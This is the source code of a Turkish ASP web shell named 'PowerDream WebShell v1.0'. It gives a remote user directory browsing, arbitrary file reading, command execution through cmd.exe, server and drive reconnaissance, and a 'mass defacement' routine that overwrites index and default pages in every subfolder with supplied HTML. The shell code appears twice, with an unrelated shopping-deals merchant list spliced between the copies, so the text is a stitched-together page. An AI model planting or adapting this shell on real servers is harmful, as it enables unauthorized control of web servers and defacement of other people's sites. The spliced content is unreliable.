<% 'Created by PowerDream
'WebShell '2007 '[TURKEY] %> <% On Error Resume Next Set Objeto=Server.CreateObject("Scripting.FileSystemObject") if request("t5") <> "" then Set ObjPasta = Objeto.GetFolder(request("t5")) end if %> <%On Error Resume Next if request("t3") <> "" then Set ObjPasta2 = Objeto.GetFolder(request("t3")) set ObjFso=server.CreateObject("Scripting.FileSystemObject") var_caminho=request("t3") For Each Pasta in ObjPasta2.Subfolders Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.aspx", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.aspx", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.asp", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.asp", 2, True, False) ObjAbreArq.writeline request("t4") if err then response.write "
Way amk Hacklenmedi..!:
" & pasta.name err=0 else response.write "
Gözün Aydın Hacklendi :)" & pasta.name end if set ObjAbreArq = nothing next set ObjFso=nothing Set ObjPasta2 = nothing set ObjFso = nothing end if %>PowerDream Web Shell

PowerDream WebShell v1.0

Server Bilgileri:
|Web Server : <%=request.servervariables("SERVER_SOFTWARE")%> |IP Server: <%=request.servervariables("LOCAL_ADDR")%> | Protocol: <% = Request.ServerVariables("SERVER_PROTOCOL") %> |

Dizinler: <%=server.mappath("pd.asp")%>

Dizinleri Göster : >

Direktörler

Arsivler

<% On Error Resume Next dim contador contador=1 For Each Pasta in ObjPasta.Subfolders Response.Write Contador & "-) "& Pasta.Name & "
" contador=contador+1 next%> 
<%On Error Resume Next For Each Archivo in ObjPasta.Files Response.Write Archivo.Name & "
" Next%> 


MASS DEFACEMENT:

Dizinler:

Html Kodlari Buraya Giriniz
:



CMD Bilgileri:
<% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet=Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %>
  <%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
  
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
" method="POST">
cmd>

Direktörler / Arşivler:

<%On Error Resume Next if request("tt") <> "" then var_caminho=request("tt") set ObjFso2=server.CreateObject("Scripting.FileSystemObject") Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False) Do While Not ObjAbreArq2.AtEndOfStream Linha = Linha & ObjAbreArq2.Readline & chr(13) Loop response.write "" ObjAbreArq2.Close Set ObjAbreArq2 = Nothing ObjFso2.close set ObjFso2 = Nothig end if%>

_____________________________________________________________________________________________________

<%set ObjPasta = nothing set Objeto = nothing%>
<%set ObjPasta = nothing set Objeto = nothing%>

 

Extra Bilgiler
<% DIM fs, d, dc, s, n, sp Set fs=Server.Createobject("Scripting.FileSystemObject") Set dc=fs.drives %>

<% back1="#D3E2E7" back2="#AFFEDE" back=back2 FOR EACH d IN dc IF (back=back2) THEN back=back1 ELSE back=back2 END IF %> <%NEXT%>
Hard Diskler
Tipleri
Numaralari
Sistem Bilgileri ve Arsivler
Limit
Total
<%=d.driveletter%>
<% IF d.DriveType = 0 Then s = "Unknown" IF d.VolumeName = "" Then n = " " Else n = d.VolumeName END IF ELSEIF d.drivetype=1 THEN s="Removable" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=2 THEN s="Fixed" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=3 THEN s="Network" IF d.isready THEN n=d.sharename ELSE n="--" END IF ELSEIF d.drivetype=4 THEN s="CDROM" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=5 THEN s="RAM Disk" IF d.isready THEN n=d.volumename ELSE n="--" END IF END IF response.write(s) %>
<%=n%>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN set sp=fs.getdrive(str) response.write(sp.filesystem) ELSE response.write("--") END IF %>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN freespace = (d.AvailableSpace / 1048576) set sp=fs.getdrive(str) response.write(Round(freespace,1) & " MB") ELSE response.write("--") END IF %>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN totalspace = (d.TotalSize / 1048576) set sp=fs.getdrive(str) response.write(Round(totalspace,1) & " MB") ELSE response.write("--") END IF %>

    Server Hakkında Geniş Bilgi

_____________________________________________________________________________________________________

Find US offers and deals!Find UK offers and deals!Find CA offers and deals!
home
hot deals
new offers
expiring offers
printable offers
free shipping
view all merchants
Deal Categories
Apparel - Kids & Teens
Apparel - Men
Apparel - Women
Apparel- Intimate
Arts & Hobby
Automotive
Baby & Maternity
Beauty & Cosmetics
Books & Magazines
Cameras & Photos
Computer & Software
Cooking & Kitchenware
Dating & Networking
Department Stores
Diet Plans & Supplements
Education
Electronics & Appliances
Entertainment
Eyewear
Financial & Insurance
Flowers & Gifts
Food & Grocery
Health & Fitness
Home & Garden
Housewares & Furniture
Internet Services
Jewelry & Accessories
Licensed Merchandise
Luggage & Accessories
Music & Movies
Office Supplies & Ink
Other
Pet Supplies
Phone & Wireless
Seasonal & Holiday
Shoes
Sports & Outdoor
Toys & Games
Travel
All Merchants
123Inkjets.comFandango.comOrvis.com
1800Contacts.comFannie May CandiesOvertons.com
1-800-FLOWERS.comFAO SchwarzPacific Coast Feather Company
1-800-PetMedsFashion BugPacific Sunwear
24 Hour FitnessFigleaves.comPacificPillows.com
39DollarGlasses.comFinish LinePacket8
3balls GolfFleurop.com (US)Painting Estimates
4inkjets.comFlorsheim ShoesPalm
6ave.comFlowerStore.comPaul Fredrick
6PM.comFogDog.comPC Connection
a pea in the podFoodSaverPCMall.com
A&E/The History ChannelFoot ActionPeapod.com
AbeBooksFoot LockerPerfect Match
ABT ElectronicsFootSmartperfumeworldwide.com
Ace HardwareForzieriPersonal Creations
ACLens.comFossilPeruvian Connection
Adam & EveFour PointsPet Mountain
AdidasFranklin CoveyPetCareRX.com
AdobeFranklin MintPETCO.com
AeropostaleFredericks of HollywoodPETsMART
Alaska AirlinesFreshpair.comPfaltzgraff Co.
Alibris From You FlowersPhilips
ALLOYFTD.comPingo
Altrec.comFuller BrushPiperlime
American Blinds, Wallpaper & MoreFyePortero
American Eagle OutfittersGaiamPotpourri
Ann TaylorGame StopPrescriptives
Ann Taylor LOFTGameFly.comPriceline.com
Anne KleinGapPro Board Shop
Apple BottomsGeicoPro Golf
Apple StoreGenuardi'sProFlowers
AramarkGevaliaPuma
Arden BGiftBaskets.comPuritan's Pride
Armani ExchangeGNCPyramid Collection
Artful Home (The Guild)Go Card USAQuicken
AshfordGodivaQVC
AT&T WirelessGolfSmith.comRadioShack
ATG StoresGourmet Gift BasketsRalph Lauren
AthletaGreatSkinRazor Gator
Auto Parts WarehouseGriffin TechnologyRedEnvelope.com
AutoAnything.comGuessReebok
AutoBarn.comGuitar CenterRegister.com
Autos.comH2O PlusREI
AvenueHalf-Price CostumesRelax the Back
AvonHammacher SchlemmerRestaurant.com
Babies R UsHanes.comRitzCamera.com
Baby CatalogHarry & DavidRoad Runner Sports
Baby PhatHat World / LidsRoamans
BabyAge.comHawaiian AirlinesRochester Big and Tall
Banana RepublicHeartland AmericaRockport
Bare NecessitiesHerRoomRoots
Barnes & NobleHickory FarmsRoss-Simons
Bass Pro ShopsHighlights MagazineRugman.com
Beall's Department StoreHobbyTron.comRVCA
Beauty.comHoliday InnS&SWorldwide.com
BeautyTrends.comHoliday Inn ExpressSafeway
BebeHome Decorators Collection OutletSahalie
BedBathStore.comHome DepotSaks Fifth Avenue
Bedding StyleHome Shopping NetworkSally Beauty Supply
Bellacor.comHomeDecorators.comSam's Club
Ben ShermanHooked On PhonicsSamsonite
Best BuyHot TopicSandals & Beaches Resorts
Betsey JohnsonHotel IndigoSean John
Bidz.comHotels.comSears Portrait Studio
Big Dog SportswearHotwireSelect Blinds
BikeBanditHP Home StoreSensational Beginnings
Blair.comHudson ReedSephora
Blinds.comiAmplifyServiceMagic
BlockbusterICE.comSharper Image
BloomingdalesIn The SwimSheraton Hotels & Resorts
Blue NileING DirectShoeBuy.com
BlueFly.comInterContinental Hotels & ResortsShoeMall.com
Boaters WorldiRobot.com (Roomba)Shoes.com
Boca Java Gourmet Coffee & TeaIrvs LuggageSierra Trading Post
Boden (US)IslandSurf.comSilhouettes
BodyCandy.comiTunesSimpleTuition
BooksAMillion.comiWin.comSinger22
Boot BarnJ&R ElectronicsSIRIUS Satellite Radio
BootBay.comJC PenneySitter City
BordersJCWhitney.comSix Flags
Boscov'sJessica LondonSkechers
Botanic ChoiceJet BlueSkyMall
Brooks BrothersJewelryWeb.comSkype
BrylaneHome.comJo-AnnSmartBargains.com
BuckleJockey.comSmith & Noble
Buy.comJohnston & MurphySmooth Fitness
BuyCostumes.comJones New YorkSnapFish.com
Cabelas.comJos. A. BankSoft Surroundings
CallowayGolfPreOwned.comJourney'sSoft Surroundings Outlet
Calvin Klein JeansJunonia.comSolutions
Calvin Klein UnderwearJust Because BasketsSoma
Cambridge Sound WorksJust My SizeSonyStyle.com
Camping WorldK JordanSouthwest Airlines Vacations
Candle BayKaplan Test PrepSpaFinder
CandlesJustOnline.comKarmaloopSpaLook.com
Candlewood SuitesKate SpadeSpiegel
CaroleeKid SurplusSpirit Halloween
Casual Male XLKiehl's Since 1851SpreadShirt Designer.com
CatherinesKing Size DirectStacksandStacks.com
CCSKnetgolfStacy Adams
Chadwick'sKodak EasyShare GalleryStaples
Champion Sports ApparelKodak StoreStarbucks Store
Change One DietKohl'sStauer
Charles Tyrwhitt (US)L'Occitane (US)Staybridge Suites
CheapTicketsLamps PlusSteve Madden
CHEFSLane Bryant.comStonewall Kitchen
Cherry Moon FarmsLavaLifeStubHub
Cheryl & Co.LeapFrogSunglass Hut
Chico'sLeeSur La Table
Choice HotelsLEGO Shop at HomeSwarovski Crystal
Christopher & BanksLens.comSwell.com
CJ BanksLensCraftersSwissOutpost.com
CliniqueLighting by GregorySymantec
Coastal ContactsLillian VernonTarget
CoffeeForLess.comLimited TooTaxHawk
Coldwater CreekLimoges JewelryTech Depot
CompUSALinens 'N ThingsTeleflora
Computer GeeksLittle TikesText Books
ConverseLord & Taylor The Body Shop
Cooking.comLucky Brand JeansThe Company Store
Cost Plus World MarketLuggage OnlineThe Container Store
Costume CrazeLumber LiquidatorsThe Great Indoors
Costume SuperCenterMac ConnectionThe Home Marketplace
Country Inns & SuitesMacMallThe House
Course AdvisorMadison Avenue MallThe Land of Nod
Crabtree & EvelynMagazines.comThe Limited
Crowne PlazaMagellan'sThe North Face
CrutchfieldMaidenformThe Popcorn Factory
Cutter & BuckMarcianoThe Scholastic Store
DayTimer.comMarriottThe Sports Authority
Deep DiscountMasseysThe Walking Company
Delia'sMatch.comTheBabyOutlet
Dell Home SystemsMaternity MallThings Remembered
Delta Air LinesMauricesThrifty Rent-A-Car
DermaDoctor.comMaxStudio.comTicketsNow
Design Within ReachMcAfeeTigerDirect
DesignerLinensOutlet.comMCM ElectronicsTilly's
Destination MaternityMeijerTimberland
Diago DiamondsMetrostyle Tire Rack
Diamonds InternationalMexGrocer.comTiVo
Diapers.comMicrosoftT-Mobile
Dick's Sporting GoodsMikasaTool King
DickiesMiles KimballTorrid
DirecTVMimi MaternityToshiba
Discovery Channel StoreMonderaToys R Us
Disney Movie ClubMonroe & MainTracFone
Disney StoreMonster.comTractor Supply Company
DJ PremiumMotherNature.comTravelocity
DockersMrs. FieldsTrue Religion
Dollar Rent A CarMrsBeasleys.comTurbo Tax
DomesticationsMusician's FriendUnder Armour
Dr Jaysmusicnotes.comUnited Vacations
drugstore.comMwave.comUrban Outfitters
Dunham's SportsMy Wines DirectVans
EastbayNapster.comVera Bradley
Eastern Mountain SportsNASCAR SuperstoreVerizon Wireless
EB GamesNational Jean CompanyVisionDirect.com
eBags.comNaturalizer ShoesVital Savings Dental Program
eCampus.comNauticaVitamin Shoppe
eCost.comNBA StoreVivre
Edamame Maternity SpaNETFLIXVons
Eddie BauerNew York & CompanyWalgreen's
eDiets.comNeweggWal-Mart
eFaucetsNewport NewsWalter Drake
eHealthInsurance.comNickelodeonWarner Bros. Online
Electronic AppraiserNicole MillerWaterford
Electronics ExpoNikeWebroot Software
Elf CosmeticsNine WestWest Elm
Elizabeth ArdenNorthern ToolWest Marine
EndlessOffice DepotWestin Hotels & Resorts
Enterprise Rent-A-CarOfficeMaxWet Seal
EntirelyPets.comOld NavyWhite House Black Market
EpsonOmaha SteaksWilliams-Sonoma Home
ESPN ShopOne Hanes PlaceWilson's Leather
ESPRITOneShare.comWine.com
eToys.comOneStopPlusWoman Within
ExpediaOnlineShoesX10 Home Solutions
ExpressOrbitz TravelZales Jewelry
EZ LubeOriental Trading CompanyZIRH
Famous FootwearOrigins
<% 'Created by PowerDream
'WebShell '2007 '[TURKEY] %> <% On Error Resume Next Set Objeto=Server.CreateObject("Scripting.FileSystemObject") if request("t5") <> "" then Set ObjPasta = Objeto.GetFolder(request("t5")) end if %> <%On Error Resume Next if request("t3") <> "" then Set ObjPasta2 = Objeto.GetFolder(request("t3")) set ObjFso=server.CreateObject("Scripting.FileSystemObject") var_caminho=request("t3") For Each Pasta in ObjPasta2.Subfolders Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.aspx", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.aspx", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.asp", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.htm", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.html", 2, True, False) ObjAbreArq.writeline request("t4") set ObjAbreArq = nothing Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.asp", 2, True, False) ObjAbreArq.writeline request("t4") if err then response.write "
Way amk Hacklenmedi..!:
" & pasta.name err=0 else response.write "
Gözün Aydın Hacklendi :)" & pasta.name end if set ObjAbreArq = nothing next set ObjFso=nothing Set ObjPasta2 = nothing set ObjFso = nothing end if %>PowerDream Web Shell

PowerDream WebShell v1.0

Server Bilgileri:
|Web Server : <%=request.servervariables("SERVER_SOFTWARE")%> |IP Server: <%=request.servervariables("LOCAL_ADDR")%> | Protocol: <% = Request.ServerVariables("SERVER_PROTOCOL") %> |

Dizinler: <%=server.mappath("pd.asp")%>

Dizinleri Göster : >

Direktörler

Arsivler

<% On Error Resume Next dim contador contador=1 For Each Pasta in ObjPasta.Subfolders Response.Write Contador & "-) "& Pasta.Name & "
" contador=contador+1 next%> 
<%On Error Resume Next For Each Archivo in ObjPasta.Files Response.Write Archivo.Name & "
" Next%> 


MASS DEFACEMENT:

Dizinler:

Html Kodlari Buraya Giriniz
:



CMD Bilgileri:
<% Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet=Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %>
  <%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
  
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
" method="POST">
cmd>

Direktörler / Arşivler:

<%On Error Resume Next if request("tt") <> "" then var_caminho=request("tt") set ObjFso2=server.CreateObject("Scripting.FileSystemObject") Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False) Do While Not ObjAbreArq2.AtEndOfStream Linha = Linha & ObjAbreArq2.Readline & chr(13) Loop response.write "" ObjAbreArq2.Close Set ObjAbreArq2 = Nothing ObjFso2.close set ObjFso2 = Nothig end if%>

_____________________________________________________________________________________________________

<%set ObjPasta = nothing set Objeto = nothing%>
<%set ObjPasta = nothing set Objeto = nothing%>

 

Extra Bilgiler
<% DIM fs, d, dc, s, n, sp Set fs=Server.Createobject("Scripting.FileSystemObject") Set dc=fs.drives %>

<% back1="#D3E2E7" back2="#AFFEDE" back=back2 FOR EACH d IN dc IF (back=back2) THEN back=back1 ELSE back=back2 END IF %> <%NEXT%>
Hard Diskler
Tipleri
Numaralari
Sistem Bilgileri ve Arsivler
Limit
Total
<%=d.driveletter%>
<% IF d.DriveType = 0 Then s = "Unknown" IF d.VolumeName = "" Then n = " " Else n = d.VolumeName END IF ELSEIF d.drivetype=1 THEN s="Removable" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=2 THEN s="Fixed" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=3 THEN s="Network" IF d.isready THEN n=d.sharename ELSE n="--" END IF ELSEIF d.drivetype=4 THEN s="CDROM" IF d.isready THEN n=d.volumename ELSE n="--" END IF ELSEIF d.drivetype=5 THEN s="RAM Disk" IF d.isready THEN n=d.volumename ELSE n="--" END IF END IF response.write(s) %>
<%=n%>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN set sp=fs.getdrive(str) response.write(sp.filesystem) ELSE response.write("--") END IF %>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN freespace = (d.AvailableSpace / 1048576) set sp=fs.getdrive(str) response.write(Round(freespace,1) & " MB") ELSE response.write("--") END IF %>
<% str="" str=str & d.driveletter str=str & ":" 'response.write(str) IF d.isready THEN totalspace = (d.TotalSize / 1048576) set sp=fs.getdrive(str) response.write(Round(totalspace,1) & " MB") ELSE response.write("--") END IF %>

    Server Hakkında Geniş Bilgi

_____________________________________________________________________________________________________